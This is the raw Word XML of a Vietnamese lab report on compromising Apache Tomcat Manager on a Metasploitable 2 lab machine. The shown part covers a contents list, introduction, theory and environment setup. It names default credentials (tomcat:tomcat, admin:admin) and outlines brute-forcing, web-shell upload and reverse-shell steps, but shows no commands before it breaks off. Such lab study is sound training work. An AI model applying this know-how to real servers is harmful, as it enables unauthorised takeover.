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B8E2B" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00AC56B5">
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D9EDD2" w14:textId="11346C13" w:rsidR="00AC56B5" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LAB</w:t>
      </w:r>
      <w:r w:rsidR="00D66574">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> THỰC HÀNH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A858833" w14:textId="0779F2D1" w:rsidR="00AC56B5" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r w:rsidR="00D66574">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TẤN CÔNG APACHE TOMCAT / JBOSS VỚI KALI LINUX VÀ METASPLOITABLE 2 (Khai thác Tomcat Manager – Tải lên Web Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC6F07C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00AC56B5">
      <w:pPr>
        <w:spacing w:before="800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F7C640" w14:textId="6C64F3D2" w:rsidR="00AC56B5" w:rsidRDefault="00AC56B5">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EAAC75" w14:textId="00E6F760" w:rsidR="002B73F9" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ACBC86" w14:textId="78C91F51" w:rsidR="002B73F9" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C36C66" w14:textId="22225634" w:rsidR="002B73F9" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A51D7DE" w14:textId="50D3245B" w:rsidR="002B73F9" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F26A68D" w14:textId="18D053DB" w:rsidR="002B73F9" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2DA9DD" w14:textId="77777777" w:rsidR="002B73F9" w:rsidRDefault="002B73F9">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497D8A66" w14:textId="5C13DBF5" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70333C59" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00AC56B5">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789F259A" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C728E24" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>1. Mở đầu ................................................................................................. 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C3C509" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>2. Cơ sở lý thuyết ...................................................................................... 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6AA875" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.1. Apache Tomcat và Tomcat Manager ............................................... 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCD8792" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.2. Lỗ hổng sử dụng mật khẩu mặc định / yếu .................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D69147" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>3. Môi trường và công cụ thực nghiệm ..................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19903533" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>4. Quy trình thực nghiệm .......................................................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55A84A" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.1. Kiểm tra kết nối và quét cổng ......................................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25F2A8" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.2. Truy cập giao diện Tomcat Manager .............................................. 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DACD5C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.3. Brute-force / dò mật khẩu mặc định bằng Metasploit ..................... 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04E9FB" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.4. Khai thác tự động bằng module tomcat_mgr_upload ...................... 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63913ECA" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.5. Khai thác thủ công – Tạo và tải lên Web Shell ................................ 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622A7EB" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.6. Thiết lập listener và nhận shell ngược ............................................ 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90C8BA" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>5. Phân tích pháp y (Forensics) ................................................................. 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F713FB0" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>6. Biện pháp phòng thủ và bài học kinh nghiệm ....................................... 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A54503" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>7. Kết luận ............................................................................................... 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D556A84" w14:textId="2EB8D5BE" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Tài liệu tham khảo ................................................................................... 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECA867" w14:textId="29052ABF" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4645A51F" w14:textId="78DC77E4" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF059AB" w14:textId="6BACC810" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8410EF" w14:textId="0B8A9C3C" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F98637D" w14:textId="742DAD5D" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1760CBC3" w14:textId="7775BECB" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B257278" w14:textId="66A56831" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729B10B7" w14:textId="41DD326B" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE4091D" w14:textId="103E7A00" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DB0B05" w14:textId="3942A16C" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C378792" w14:textId="0958D5FE" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30161E9B" w14:textId="5BA0F606" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490B3C97" w14:textId="4F2042B9" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AC9331" w14:textId="2E978C6E" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F31255" w14:textId="36130D76" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F845C1" w14:textId="3698C771" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E281B16" w14:textId="03A3D717" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7F3465" w14:textId="77777777" w:rsidR="0076003E" w:rsidRDefault="0076003E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E42F69" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB8086" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Tomcat là một trong những máy chủ ứng dụng web Java phổ biến nhất. Giao diện quản trị Tomcat Manager cho phép triển khai (deploy) các ứng dụng web dưới dạng file WAR. Khi tài khoản quản trị sử dụng mật khẩu mặc định hoặc yếu, kẻ tấn công có thể đăng nhập và tải lên một Web Shell, từ đó chiếm quyền điều khiển máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E630E" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Báo cáo này trình bày quá trình thực nghiệm tấn công Apache Tomcat trên hệ thống Metasploitable 2 bằng Kali Linux. Mục tiêu chính là chiếm quyền điều khiển máy chủ thông qua việc tải lên Web Shell qua giao diện Tomcat Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AAF53C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Các mục tiêu cụ thể bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F073E" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Xác định dịch vụ Tomcat đang chạy và cổng mở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515A685" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Dò tìm thông tin đăng nhập mặc định/yếu của Tomcat Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA223B9" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện khai thác tự động và thủ công để tải lên Web Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094116CC" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Nhận shell ngược và xác nhận quyền điều khiển.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114587E" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Phân tích pháp y (forensics) và rút ra biện pháp phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24939F16" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. CƠ SỞ LÝ THUYẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AC324" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1. Apache Tomcat và Tomcat Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D261B" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Tomcat là máy chủ servlet/JSP mã nguồn mở, thường chạy trên cổng 8080 hoặc 8180. Tomcat Manager là ứng dụng web tích hợp cho phép quản trị viên triển khai, gỡ bỏ và quản lý các ứng dụng web thông qua giao diện HTML. Để triển khai ứng dụng, người dùng cần xác thực Basic Authentication với tài khoản có quyền manager-script hoặc manager-gui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501B8E1C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu kẻ tấn công chiếm được quyền truy cập Manager, họ có thể tải lên file WAR chứa mã độc (Web Shell). Khi ứng dụng được triển khai, shell sẽ thực thi và có thể kết nối ngược về máy tấn công, cho phép điều khiển hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2799C5" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Lỗ hổng sử dụng mật khẩu mặc định / yếu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642ECFD" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploitable 2 được cấu hình với nhiều dịch vụ sử dụng mật khẩu mặc định hoặc rất yếu. Đối với Tomcat, cặp tài khoản phổ biến là tomcat:tomcat hoặc admin:admin. Đây không phải là lỗ hổng zero-day phức tạp, nhưng là lỗi cấu hình phổ biến trong thực tế, dẫn đến hệ quả nghiêm trọng nếu Manager App được mở ra Internet hoặc mạng nội bộ không được bảo vệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A7841" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. MÔI TRƯỜNG VÀ CÔNG CỤ THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34475C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Môi trường thực nghiệm được thiết lập như sau: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C56B5" w14:paraId="16917743" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="6FA23DB4" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="3E2625D1" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Hệ điều hành / IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="58858D7A" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cấu hình mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC56B5" w14:paraId="0FE8B58C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6598F511" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Máy tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37FE8211" w14:textId="72AA1724" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux – </w:t>
            </w:r>
            <w:r w:rsidR="006B7508">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>attack</w:t>
            </w:r>
            <w:r w:rsidR="00975C69">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39D08770" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bridge Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC56B5" w14:paraId="1CB54F66" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D8977E0" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Máy mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DC8B92C" w14:textId="093377DF" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable 2 – </w:t>
            </w:r>
            <w:r w:rsidR="00975C69">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>victim ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28749CEF" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bridge Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72B3B5F9" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:before="160" w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Các công cụ chính được sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358FAF4" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap – quét cổng và nhận diện phiên bản dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A05941" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit Framework – module quét mật khẩu và module khai thác Tomcat Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8CDAC6" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
